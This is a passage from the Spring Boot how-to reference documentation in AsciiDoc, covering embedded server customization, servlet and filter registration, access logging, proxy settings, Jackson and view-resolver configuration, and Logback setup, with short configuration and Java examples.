see\n\"`<<howto-discover-build-in-options-for-external-properties>>`\"). The `server.{asterisk}`\nnamespace is quite useful here, and it includes namespaces like `server.tomcat.{asterisk}`,\n`server.jetty.{asterisk}` and others, for server-specific features.\nSee the list of <<common-application-properties>>.\n\nThe previous sections covered already many common use cases, such as compression, SSL\nor HTTP\/2. However, if a configuration key doesn't exist for your use case, you should\nthen look at\n{dc-spring-boot}\/web\/server\/WebServerFactoryCustomizer.html[`WebServerFactoryCustomizer`].\nYou can declare such a component and get access to the server factory relevant to your\nchoice: you should select the variant for the chosen Server (Tomcat, Jetty, Reactor Netty,\nUndertow) and the chosen web stack (Servlet or Reactive).\n\nThe example below is for Tomcat with the `spring-boot-starter-web` (Servlet stack):\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\tpublic class MyTomcatWebServerCustomizer\n\t\t\timplements WebServerFactoryCustomizer<TomcatServletWebServerFactory> {\n\n\t\t@Override\n\t\tpublic void customize(TomcatServletWebServerFactory factory) {\n\t\t\t\/\/ customize the factory here\n\t\t}\n\t}\n----\n\nIn addition Spring Boot provides:\n\n[[howto-configure-webserver-customizers]]\n[cols=\"1,2,2\", options=\"header\"]\n|===\n| Server | Servlet stack | Reactive stack\n\n| Tomcat\n| `TomcatServletWebServerFactory`\n| `TomcatReactiveWebServerFactory`\n\n| Jetty\n| `JettyServletWebServerFactory`\n| `JettyReactiveWebServerFactory`\n\n| Undertow\n| `UndertowServletWebServerFactory`\n| `UndertowReactiveWebServerFactory`\n\n| Reactor\n| N\/A\n| `NettyReactiveWebServerFactory`\n\n|===\n\nOnce you've got access to a `WebServerFactory`, you can often add customizers to it to\nconfigure specific parts, like connectors, server resources, or the server itself - all\nusing server-specific APIs.\n\nAs a last resort, you can also declare your own `WebServerFactory` component, which will\noverride the one provided by Spring Boot. In this case, you can't rely on configuration\nproperties in the `server` namespace anymore.\n\n\n\n[[howto-add-a-servlet-filter-or-listener]]\n=== Add a Servlet, Filter, or Listener to an Application\nIn a servlet stack application, i.e. with the `spring-boot-starter-web`, there are two\nways to add `Servlet`, `Filter`, `ServletContextListener`, and the other listeners\nsupported by the Servlet API to your application:\n\n* <<howto-add-a-servlet-filter-or-listener-as-spring-bean>>\n* <<howto-add-a-servlet-filter-or-listener-using-scanning>>\n\n\n\n[[howto-add-a-servlet-filter-or-listener-as-spring-bean]]\n==== Add a Servlet, Filter, or Listener by Using a Spring Bean\nTo add a `Servlet`, `Filter`, or Servlet `*Listener` by using a Spring bean, you must\nprovide a `@Bean` definition for it. Doing so can be very useful when you want to inject\nconfiguration or dependencies. However, you must be very careful that they do not cause\neager initialization of too many other beans, because they have to be installed in the\ncontainer very early in the application lifecycle. (For example, it is not a good idea to\nhave them depend on your `DataSource` or JPA configuration.) You can work around such\nrestrictions by initializing the beans lazily when first used instead of on\ninitialization.\n\nIn the case of `Filters` and `Servlets`, you can also add mappings and init parameters by\nadding a `FilterRegistrationBean` or a `ServletRegistrationBean` instead of or in\naddition to the underlying component.\n\n[NOTE]\n====\nIf no `dispatcherType` is specified on a filter registration, `REQUEST` is used. This\naligns with the Servlet Specification's default dispatcher type.\n====\n\nLike any other Spring bean, you can define the order of Servlet filter beans; please\nmake sure to check the\n\"`<<spring-boot-features.adoc#boot-features-embedded-container-servlets-filters-listeners-beans>>`\"\nsection.\n\n\n\n[[howto-disable-registration-of-a-servlet-or-filter]]\n===== Disable Registration of a Servlet or Filter\nAs <<howto-add-a-servlet-filter-or-listener-as-spring-bean,described earlier>>, any\n`Servlet` or `Filter` beans are registered with the servlet container automatically. To\ndisable registration of a particular `Filter` or `Servlet` bean, create a registration\nbean for it and mark it as disabled, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic FilterRegistrationBean registration(MyFilter filter) {\n\t\tFilterRegistrationBean registration = new FilterRegistrationBean(filter);\n\t\tregistration.setEnabled(false);\n\t\treturn registration;\n\t}\n----\n\n\n\n[[howto-add-a-servlet-filter-or-listener-using-scanning]]\n==== Add Servlets, Filters, and Listeners by Using Classpath Scanning\n`@WebServlet`, `@WebFilter`, and `@WebListener` annotated classes can be automatically\nregistered with an embedded servlet container by annotating a `@Configuration` class\nwith `@ServletComponentScan` and specifying the package(s) containing the components\nthat you want to register. By default, `@ServletComponentScan` scans from the package\nof the annotated class.\n\n\n\n[[howto-configure-accesslogs]]\n=== Configure Access Logging\nAccess logs can be configured for Tomcat, Undertow, and Jetty through their respective\nnamespaces.\n\nFor instance, the following settings log access on Tomcat with a\n{tomcat-documentation}\/config\/valve.html#Access_Logging[custom pattern].\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.tomcat.basedir=my-tomcat\n\tserver.tomcat.accesslog.enabled=true\n\tserver.tomcat.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nNOTE: The default location for logs is a `logs` directory relative to the Tomcat base\ndirectory. By default, the `logs` directory is a temporary directory, so you may want to\nfix Tomcat's base directory or use an absolute path for the logs. In the preceding\nexample, the logs are available in `my-tomcat\/logs` relative to the working directory of\nthe application.\n\nAccess logging for Undertow can be configured in a similar fashion, as shown in the\nfollowing example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.undertow.accesslog.enabled=true\n\tserver.undertow.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nLogs are stored in a `logs` directory relative to the working directory of the\napplication. You can customize this location by setting the\n`server.undertow.accesslog.dir` property.\n\nFinally, access logging for Jetty can also be configured as follows:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.jetty.accesslog.enabled=true\n\tserver.jetty.accesslog.filename=\/var\/log\/jetty-access.log\n----\n\nBy default, logs are redirected to `System.err`. For more details, see\n{jetty-documentation}\/configuring-jetty-request-logs.html[the Jetty documentation].\n\n\n\n[[howto-use-behind-a-proxy-server]]\n[[howto-use-tomcat-behind-a-proxy-server]]\n=== Running Behind a Front-end Proxy Server\nYour application might need to send `302` redirects or render content with absolute links\nback to itself. When running behind a proxy, the caller wants a link to the proxy and not\nto the physical address of the machine hosting your app. Typically, such situations are\nhandled through a contract with the proxy, which adds headers to tell the back end how to\nconstruct links to itself.\n\nIf the proxy adds conventional `X-Forwarded-For` and `X-Forwarded-Proto` headers (most\nproxy servers do so), the absolute links should be rendered correctly, provided\n`server.use-forward-headers` is set to `true` in your `application.properties`.\n\nNOTE: If your application runs in Cloud Foundry or Heroku, the\n`server.use-forward-headers` property defaults to `true`. In all\nother instances, it defaults to `false`.\n\n\n\n[[howto-customize-tomcat-behind-a-proxy-server]]\n==== Customize Tomcat's Proxy Configuration\nIf you use Tomcat, you can additionally configure the names of the headers used to\ncarry \"`forwarded`\" information, as shown in the following example:\n\n[indent=0]\n----\n\tserver.tomcat.remote-ip-header=x-your-remote-ip-header\n\tserver.tomcat.protocol-header=x-your-protocol-header\n----\n\nTomcat is also configured with a default regular expression that matches internal\nproxies that are to be trusted. By default, IP addresses in `10\/8`, `192.168\/16`,\n`169.254\/16` and `127\/8` are trusted. You can customize the valve's configuration by\nadding an entry to `application.properties`, as shown in the following example:\n\n[indent=0]\n----\n\tserver.tomcat.internal-proxies=192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\n----\n\nNOTE: The double backslashes are required only when you use a properties file for\nconfiguration. If you use YAML, single backslashes are sufficient, and a value\nequivalent to that shown in the preceding example would be `192\\.168\\.\\d{1,3}\\.\\d{1,3}`.\n\nNOTE: You can trust all proxies by setting the `internal-proxies` to empty (but do not do\nso in production).\n\nYou can take complete control of the configuration of Tomcat's `RemoteIpValve` by\nswitching the automatic one off (to do so, set `server.use-forward-headers=false`) and\nadding a new valve instance in a `TomcatServletWebServerFactory` bean.\n\n\n\n[[howto-enable-multiple-connectors-in-tomcat]]\n=== Enable Multiple Connectors with Tomcat\nYou can add an `org.apache.catalina.connector.Connector` to the\n`TomcatServletWebServerFactory`, which can allow multiple connectors, including HTTP and\nHTTPS connectors, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic ServletWebServerFactory servletContainer() {\n\t\tTomcatServletWebServerFactory tomcat = new TomcatServletWebServerFactory();\n\t\ttomcat.addAdditionalTomcatConnectors(createSslConnector());\n\t\treturn tomcat;\n\t}\n\n\tprivate Connector createSslConnector() {\n\t\tConnector connector = new Connector(\"org.apache.coyote.http11.Http11NioProtocol\");\n\t\tHttp11NioProtocol protocol = (Http11NioProtocol) connector.getProtocolHandler();\n\t\ttry {\n\t\t\tFile keystore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tFile truststore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tconnector.setScheme(\"https\");\n\t\t\tconnector.setSecure(true);\n\t\t\tconnector.setPort(8443);\n\t\t\tprotocol.setSSLEnabled(true);\n\t\t\tprotocol.setKeystoreFile(keystore.getAbsolutePath());\n\t\t\tprotocol.setKeystorePass(\"changeit\");\n\t\t\tprotocol.setTruststoreFile(truststore.getAbsolutePath());\n\t\t\tprotocol.setTruststorePass(\"changeit\");\n\t\t\tprotocol.setKeyAlias(\"apitester\");\n\t\t\treturn connector;\n\t\t}\n\t\tcatch (IOException ex) {\n\t\t\tthrow new IllegalStateException(\"can't access keystore: [\" + \"keystore\"\n\t\t\t\t\t+ \"] or truststore: [\" + \"keystore\" + \"]\", ex);\n\t\t}\n\t}\n----\n\n\n\n[[howto-use-tomcat-legacycookieprocessor]]\n=== Use Tomcat's LegacyCookieProcessor\nBy default, the embedded Tomcat used by Spring Boot does not support \"Version 0\" of the\nCookie format, so you may see the following error:\n\n[indent=0]\n----\n\tjava.lang.IllegalArgumentException: An invalid character [32] was present in the Cookie value\n----\n\nIf at all possible, you should consider updating your code to only store values\ncompliant with later Cookie specifications. If, however, you cannot change the\nway that cookies are written, you can instead configure Tomcat to use a\n`LegacyCookieProcessor`. To switch to the `LegacyCookieProcessor`, use an\n`WebServerFactoryCustomizer` bean that adds a `TomcatContextCustomizer`, as shown\nin the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/embedded\/TomcatLegacyCookieProcessorExample.java[tag=customizer]\n----\n\n\n\n[[howto-enable-multiple-listeners-in-undertow]]\n=== Enable Multiple Listeners with Undertow\nAdd an `UndertowBuilderCustomizer` to the `UndertowServletWebServerFactory` and\nadd a listener to the `Builder`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic UndertowServletWebServerFactory servletWebServerFactory() {\n\t\tUndertowServletWebServerFactory factory = new UndertowServletWebServerFactory();\n\t\tfactory.addBuilderCustomizers(new UndertowBuilderCustomizer() {\n\n\t\t\t@Override\n\t\t\tpublic void customize(Builder builder) {\n\t\t\t\tbuilder.addHttpListener(8080, \"0.0.0.0\");\n\t\t\t}\n\n\t\t});\n\t\treturn factory;\n\t}\n----\n\n\n\n[[howto-create-websocket-endpoints-using-serverendpoint]]\n=== Create WebSocket Endpoints Using @ServerEndpoint\nIf you want to use `@ServerEndpoint` in a Spring Boot application that used an embedded\ncontainer, you must declare a single `ServerEndpointExporter` `@Bean`, as shown in the\nfollowing example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic ServerEndpointExporter serverEndpointExporter() {\n\t\treturn new ServerEndpointExporter();\n\t}\n----\n\nThe bean shown in the preceding example registers any `@ServerEndpoint` annotated beans\nwith the underlying WebSocket container. When deployed to a standalone servlet container,\nthis role is performed by a servlet container initializer, and the\n`ServerEndpointExporter` bean is not required.\n\n\n\n[[howto-spring-mvc]]\n== Spring MVC\n\nSpring Boot has a number of starters that include Spring MVC. Note that some starters\ninclude a dependency on Spring MVC rather than include it directly. This section answers\ncommon questions about Spring MVC and Spring Boot.\n\n[[howto-write-a-json-rest-service]]\n=== Write a JSON REST Service\nAny Spring `@RestController` in a Spring Boot application should render JSON response by\ndefault as long as Jackson2 is on the classpath, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RestController\n\tpublic class MyController {\n\n\t\t@RequestMapping(\"\/thing\")\n\t\tpublic MyThing thing() {\n\t\t\t\treturn new MyThing();\n\t\t}\n\n\t}\n----\n\nAs long as `MyThing` can be serialized by Jackson2 (true for a normal POJO or Groovy\nobject), then `http:\/\/localhost:8080\/thing` serves a JSON representation of it by\ndefault. Note that, in a browser, you might sometimes see XML responses, because browsers\ntend to send accept headers that prefer XML.\n\n\n\n[[howto-write-an-xml-rest-service]]\n=== Write an XML REST Service\nIf you have the Jackson XML extension (`jackson-dataformat-xml`) on the classpath, you\ncan use it to render XML responses. The previous example that we used for JSON would\nwork. To use the Jackson XML renderer, add the following dependency to your project:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>com.fasterxml.jackson.dataformat<\/groupId>\n\t\t<artifactId>jackson-dataformat-xml<\/artifactId>\n\t<\/dependency>\n----\n\nIf Jackson's XML extension is not available and JAXB is available, XML can be rendered\nwith the additional requirement of having `MyThing` annotated as `@XmlRootElement`, as\nshown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@XmlRootElement\n\tpublic class MyThing {\n\t\tprivate String name;\n\t\t\/\/ .. getters and setters\n\t}\n----\n\nJAXB is only available out of the box with Java 8. If you're using a more recent Java\ngeneration, add the following dependency to your project:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.glassfish.jaxb<\/groupId>\n\t\t<artifactId>jaxb-runtime<\/artifactId>\n\t<\/dependency>\n----\n\nNOTE: To get the server to render XML instead of JSON, you might have to send an\n`Accept: text\/xml` header (or use a browser).\n\n\n\n[[howto-customize-the-jackson-objectmapper]]\n=== Customize the Jackson ObjectMapper\nSpring MVC (client and server side) uses `HttpMessageConverters` to negotiate content\nconversion in an HTTP exchange. If Jackson is on the classpath, you already get the\ndefault converter(s) provided by `Jackson2ObjectMapperBuilder`, an instance of which\nis auto-configured for you.\n\nThe `ObjectMapper` (or `XmlMapper` for Jackson XML converter) instance (created by\ndefault) has the following customized properties:\n\n* `MapperFeature.DEFAULT_VIEW_INCLUSION` is disabled\n* `DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES` is disabled\n* `SerializationFeature.WRITE_DATES_AS_TIMESTAMPS` is disabled\n\nSpring Boot also has some features to make it easier to customize this behavior.\n\nYou can configure the `ObjectMapper` and `XmlMapper` instances by using the environment.\nJackson provides an extensive suite of simple on\/off features that can be used to\nconfigure various aspects of its processing. These features are described in six enums (in\nJackson) that map onto properties in the environment:\n\n|===\n|Enum|Property|Values\n\n|`com.fasterxml.jackson.databind.DeserializationFeature`\n|`spring.jackson.deserialization.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.core.JsonGenerator.Feature`\n|`spring.jackson.generator.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.databind.MapperFeature`\n|`spring.jackson.mapper.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.core.JsonParser.Feature`\n|`spring.jackson.parser.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.databind.SerializationFeature`\n|`spring.jackson.serialization.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.annotation.JsonInclude.Include`\n|`spring.jackson.default-property-inclusion`\n|`always`, `non_null`, `non_absent`, `non_default`, `non_empty`\n|===\n\nFor example, to enable pretty print, set `spring.jackson.serialization.indent_output=true`.\nNote that, thanks to the use of <<boot-features-external-config-relaxed-binding,\nrelaxed binding>>, the case of `indent_output` does not have to match the case of the\ncorresponding enum constant, which is `INDENT_OUTPUT`.\n\nThis environment-based configuration is applied to the auto-configured\n`Jackson2ObjectMapperBuilder` bean and applies to any mappers created by\nusing the builder, including the auto-configured `ObjectMapper` bean.\n\nThe context's `Jackson2ObjectMapperBuilder` can be customized by one or more\n`Jackson2ObjectMapperBuilderCustomizer` beans. Such customizer beans can be ordered\n(Boot's own customizer has an order of 0), letting additional customization be applied\nboth before and after Boot's customization.\n\nAny beans of type `com.fasterxml.jackson.databind.Module` are automatically registered\nwith the auto-configured `Jackson2ObjectMapperBuilder` and are applied to any `ObjectMapper`\ninstances that it creates. This provides a global mechanism for contributing custom\nmodules when you add new features to your application.\n\nIf you want to replace the default `ObjectMapper` completely, either define a `@Bean` of\nthat type and mark it as `@Primary` or, if you prefer the builder-based\napproach, define a `Jackson2ObjectMapperBuilder` `@Bean`. Note that, in either case,\ndoing so disables all auto-configuration of the `ObjectMapper`.\n\nIf you provide any `@Beans` of type `MappingJackson2HttpMessageConverter`,\nthey replace the default value in the MVC configuration. Also, a convenience bean of type\n`HttpMessageConverters` is provided (and is always available if you use the default MVC\nconfiguration). It has some useful methods to access the default and user-enhanced\nmessage converters.\n\nSee the \"`<<howto-customize-the-responsebody-rendering>>`\" section and the\n{sc-spring-boot-autoconfigure}\/web\/servlet\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\nsource code for more details.\n\n\n\n[[howto-customize-the-responsebody-rendering]]\n=== Customize the @ResponseBody Rendering\nSpring uses `HttpMessageConverters` to render `@ResponseBody` (or responses from\n`@RestController`). You can contribute additional converters by adding beans of the\nappropriate type in a Spring Boot context. If a bean you add is of a type that would have\nbeen included by default anyway (such as `MappingJackson2HttpMessageConverter` for JSON\nconversions), it replaces the default value. A convenience bean of type\n`HttpMessageConverters` is provided and is always available if you use the default MVC\nconfiguration. It has some useful methods to access the default and user-enhanced message\nconverters (For example, it can be useful if you want to manually inject them into a\ncustom `RestTemplate`).\n\nAs in normal MVC usage, any `WebMvcConfigurer` beans that you provide can also\ncontribute converters by overriding the `configureMessageConverters` method. However, unlike\nwith normal MVC, you can supply only additional converters that you need (because Spring\nBoot uses the same mechanism to contribute its defaults). Finally, if you opt out of the\nSpring Boot default MVC configuration by providing your own `@EnableWebMvc` configuration,\nyou can take control completely and do everything manually by using\n`getMessageConverters` from `WebMvcConfigurationSupport`.\n\nSee the\n{sc-spring-boot-autoconfigure}\/web\/servlet\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\nsource code for more details.\n\n\n\n[[howto-multipart-file-upload-configuration]]\n=== Handling Multipart File Uploads\nSpring Boot embraces the Servlet 3 `javax.servlet.http.Part` API to support uploading\nfiles. By default, Spring Boot configures Spring MVC with a maximum size of 1MB per\nfile and a maximum of 10MB of file data in a single request. You may override these\nvalues, the location to which intermediate data is stored (for example, to the `\/tmp`\ndirectory), and the threshold past which data is flushed to disk by using the properties\nexposed in the `MultipartProperties` class. For example, if you want to specify that\nfiles be unlimited, set the `spring.servlet.multipart.max-file-size` property to `-1`.\n\nThe multipart support is helpful when you want to receive multipart encoded file data as\na `@RequestParam`-annotated parameter of type `MultipartFile` in a Spring MVC controller\nhandler method.\n\nSee the\n{sc-spring-boot-autoconfigure}\/web\/servlet\/MultipartAutoConfiguration.{sc-ext}[`MultipartAutoConfiguration`]\nsource for more details.\n\nNOTE: It is recommended to use the container's built-in support for multipart uploads\nrather than introducing an additional dependency such as Apache Commons File Upload.\n\n\n\n[[howto-switch-off-the-spring-mvc-dispatcherservlet]]\n=== Switch Off the Spring MVC DispatcherServlet\nBy default, all content is served from the root of your application (`\/`). If you\nwould rather map to a different path, you can configure one as follows:\n\n[source,properties,indent=0,subs=\"verbatim\"]\n----\n\tspring.mvc.servlet.path=\/acme\n----\n\nIf you have additional servlets you can declare a `@Bean` of type `Servlet` or\n`ServletRegistrationBean` for each and Spring Boot will register them transparently to the\ncontainer. Because servlets are registered that way, they can be mapped to a sub-context\nof the `DispatcherServlet` without invoking it.\n\nConfiguring the `DispatcherServlet` yourself is unusual but if you really need to do it, a\n`@Bean` of type `DispatcherServletPath` must be provided as well to provide the path of\nyour custom `DispatcherServlet`.\n\n\n\n[[howto-switch-off-default-mvc-configuration]]\n=== Switch off the Default MVC Configuration\nThe easiest way to take complete control over MVC configuration is to provide your own\n`@Configuration` with the `@EnableWebMvc` annotation. Doing so leaves all MVC\nconfiguration in your hands.\n\n\n\n[[howto-customize-view-resolvers]]\n=== Customize ViewResolvers\nA `ViewResolver` is a core component of Spring MVC, translating view names in\n`@Controller` to actual `View` implementations. Note that `ViewResolvers` are mainly\nused in UI applications, rather than REST-style services (a `View` is not used to render\na `@ResponseBody`). There are many implementations of `ViewResolver` to choose from, and\nSpring on its own is not opinionated about which ones you should use. Spring Boot, on the\nother hand, installs one or two for you, depending on what it finds on the classpath and\nin the application context. The `DispatcherServlet` uses all the resolvers it finds in\nthe application context, trying each one in turn until it gets a result, so, if you\nadd your own, you have to be aware of the order and in which position your resolver is\nadded.\n\n`WebMvcAutoConfiguration` adds the following `ViewResolvers` to your context:\n\n* An `InternalResourceViewResolver` named '`defaultViewResolver`'. This one locates\nphysical resources that can be rendered by using the `DefaultServlet` (including static\nresources and JSP pages, if you use those). It applies a prefix and a suffix to the\nview name and then looks for a physical resource with that path in the servlet context\n(the defaults are both empty but are accessible for external configuration through\n`spring.mvc.view.prefix` and `spring.mvc.view.suffix`). You can override it by\nproviding a bean of the same type.\n* A `BeanNameViewResolver` named '`beanNameViewResolver`'. This is a useful member of the\nview resolver chain and picks up any beans with the same name as the `View` being\nresolved. It should not be necessary to override or replace it.\n* A `ContentNegotiatingViewResolver` named '`viewResolver`' is added only if there *are*\nactually beans of type `View` present. This is a '`master`' resolver, delegating to all\nthe others and attempting to find a match to the '`Accept`' HTTP header sent by the\nclient. There is a useful\nhttps:\/\/spring.io\/blog\/2013\/06\/03\/content-negotiation-using-views[blog about\n`ContentNegotiatingViewResolver`] that you might like to study to learn more, and you\nmight also look at the source code for detail. You can switch off the auto-configured\n`ContentNegotiatingViewResolver` by defining a bean named '`viewResolver`'.\n* If you use Thymeleaf, you also have a `ThymeleafViewResolver` named\n'`thymeleafViewResolver`'. It looks for resources by surrounding the view name with a\nprefix and suffix. The prefix is `spring.thymeleaf.prefix`, and the suffix is\n`spring.thymeleaf.suffix`. The values of the prefix and suffix default to\n'`classpath:\/templates\/`' and '`.html`', respectively. You can override\n`ThymeleafViewResolver` by providing a bean of the same name.\n* If you use FreeMarker, you also have a `FreeMarkerViewResolver` named\n'`freeMarkerViewResolver`'. It looks for resources in a loader path (which is\nexternalized to `spring.freemarker.templateLoaderPath` and has a default value of\n'`classpath:\/templates\/`') by surrounding the view name with a prefix and a suffix. The\nprefix is externalized to `spring.freemarker.prefix`, and the suffix is externalized to\n`spring.freemarker.suffix`. The default values of the prefix and suffix are empty and\n'`.ftl`', respectively. You can override `FreeMarkerViewResolver` by providing a bean\nof the same name.\n* If you use Groovy templates (actually, if `groovy-templates` is on your classpath), you\nalso have a `GroovyMarkupViewResolver` named '`groovyMarkupViewResolver`'. It looks for\nresources in a loader path by surrounding the view name with a prefix and suffix\n(externalized to `spring.groovy.template.prefix` and `spring.groovy.template.suffix`).\nThe prefix and suffix have default values of '`classpath:\/templates\/`' and '`.tpl`',\nrespectively. You can override `GroovyMarkupViewResolver` by providing a bean of the\nsame name.\n\nFor more detail, see the following sections:\n\n* {sc-spring-boot-autoconfigure}\/web\/servlet\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\n* {sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[`ThymeleafAutoConfiguration`]\n* {sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[`FreeMarkerAutoConfiguration`]\n* {sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[`GroovyTemplateAutoConfiguration`]\n\n\n\n[[howto-use-test-with-spring-security]]\n== Testing With Spring Security\nSpring Security provides support for running tests as a specific user.\nFor example, the test in the snippet below will run with an authenticated user\nthat has the `ADMIN` role.\n\n[source,java,indent=0]\n----\n\t@Test\n\t@WithMockUser(roles=\"ADMIN\")\n\tpublic void requestProtectedUrlWithUser() throws Exception {\n\t\tmvc\n\t\t\t.perform(get(\"\/\"))\n\t\t\t...\n\t}\n----\n\nSpring Security provides comprehensive integration with Spring MVC Test and\nthis can also be used when testing controllers using the `@WebMvcTest` slice and `MockMvc`.\n\nFor additional details on Spring Security's testing support, refer to Spring Security's\nhttps:\/\/docs.spring.io\/spring-security\/site\/docs\/current\/reference\/htmlsingle\/#test[reference documentation]).\n\n\n\n[[howto-jersey]]\n== Jersey\n\n\n\n[[howto-jersey-spring-security]]\n=== Secure Jersey endpoints with Spring Security\nSpring Security can be used to secure a Jersey-based web application in much the same\nway as it can be used to secure a Spring MVC-based web application. However, if you want\nto use Spring Security's method-level security with Jersey, you must configure Jersey to\nuse `setStatus(int)` rather `sendError(int)`. This prevents Jersey from committing the\nresponse before Spring Security has had an opportunity to report an authentication or\nauthorization failure to the client.\n\nThe `jersey.config.server.response.setStatusOverSendError` property must be set to `true`\non the application's `ResourceConfig` bean, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/jersey\/JerseySetStatusOverSendErrorExample.java[tag=resource-config]\n----\n\n\n\n[[howto-http-clients]]\n== HTTP Clients\n\nSpring Boot offers a number of starters that work with HTTP clients. This section answers\nquestions related to using them.\n\n[[howto-http-clients-proxy-configuration]]\n=== Configure RestTemplate to Use a Proxy\nAs described in <<spring-boot-features.adoc#boot-features-resttemplate-customization>>,\nyou can use a `RestTemplateCustomizer` with `RestTemplateBuilder` to build a customized\n`RestTemplate`. This is the recommended approach for creating a `RestTemplate` configured\nto use a proxy.\n\nThe exact details of the proxy configuration depend on the underlying client request\nfactory that is being used. The following example configures\n`HttpComponentsClientRequestFactory` with an `HttpClient` that uses a proxy for all hosts\nexcept `192.168.0.5`:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/web\/client\/RestTemplateProxyCustomizationExample.java[tag=customizer]\n----\n\n\n\n[[howto-logging]]\n== Logging\n\nSpring Boot has no mandatory logging dependency, except for the Commons Logging API, which\nis typically provided by Spring Framework's `spring-jcl` module. To use\nhttps:\/\/logback.qos.ch[Logback], you need to include it and `spring-jcl` on the classpath.\nThe simplest way to do that is through the starters, which all depend on\n`spring-boot-starter-logging`. For a web application, you need only\n`spring-boot-starter-web`, since it depends transitively on the logging starter. If you\nuse Maven, the following dependency adds logging for you:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n----\n\nSpring Boot has a `LoggingSystem` abstraction that attempts to configure logging based on\nthe content of the classpath. If Logback is available, it is the first choice.\n\nIf the only change you need to make to logging is to set the levels of various loggers,\nyou can do so in `application.properties` by using the \"logging.level\" prefix, as shown\nin the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.level.org.springframework.web=DEBUG\n\tlogging.level.org.hibernate=ERROR\n----\n\nYou can also set the location of a file to which to write the log (in addition to the\nconsole) by using \"logging.file\".\n\nTo configure the more fine-grained settings of a logging system, you need to use the native\nconfiguration format supported by the `LoggingSystem` in question. By default, Spring Boot\npicks up the native configuration from its default location for the system (such as\n`classpath:logback.xml` for Logback), but you can set the location of the config file by\nusing the \"logging.config\" property.\n\n\n\n[[howto-configure-logback-for-logging]]\n=== Configure Logback for Logging\nIf you put a `logback.xml` in the root of your classpath, it is picked up from there (or\nfrom `logback-spring.xml`, to take advantage of the templating features provided by\nBoot). Spring Boot provides a default base configuration that you can include if you\nwant to set levels, as shown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/base.xml\"\/>\n\t\t<logger name=\"org.springframework.web\" level=\"DEBUG\"\/>\n\t<\/configuration>\n----\n\nIf you look at `base.xml` in the spring-boot jar, you can see that it uses\nsome useful System properties that the `LoggingSystem` takes care of creating for you:\n\n* `$\\{PID}`: The current process ID.\n* `$\\{LOG_FILE}`: Whether `logging.file` was set in Boot's external configuration.\n* `$\\{LOG_PATH}`: Whether `logging.path` (representing a directory for\n log files to live in) was set in Boot's external configuration.\n* `$\\{LOG_EXCEPTION_CONVERSION_WORD}`: Whether `logging.exception-conversion-word` was set\n in Boot's external configuration.\n\nSpring Boot also provides some nice ANSI color terminal output on a console (but not in\na log file) by using a custom Logback converter. See the default `base.xml` configuration\nfor details.\n\nIf Groovy is on the classpath, you should be able to configure Logback with\n`logback.groovy` as well. If present, this setting is given preference.\n\n\n\n[[howto-configure-logback-for-logging-fileonly]]\n==== Configure Logback for File-only Output\nIf you want to disable console logging and write output only to a file, you need a custom\n`logback-spring.xml` that imports `file-appender.xml` but not `console-appender.xml`, as\nshown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/defaults.xml\" \/>\n\t\t<property name=\"LOG_FILE\" value=\"${LOG_FILE:-${LOG_PATH:-${LOG_TEMP:-${java.io.tmpdir:-\/tmp}}\/}spring.log}\"\/>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/file-appender.xml\" \/>\n\t\t<root level=\"INFO\">\n\t\t\t<appender-ref ref=\"FILE\" \/>\n\t\t<\/root>\n\t<\/configuration>\n----\n\nYou also need to add `logging.file` to your 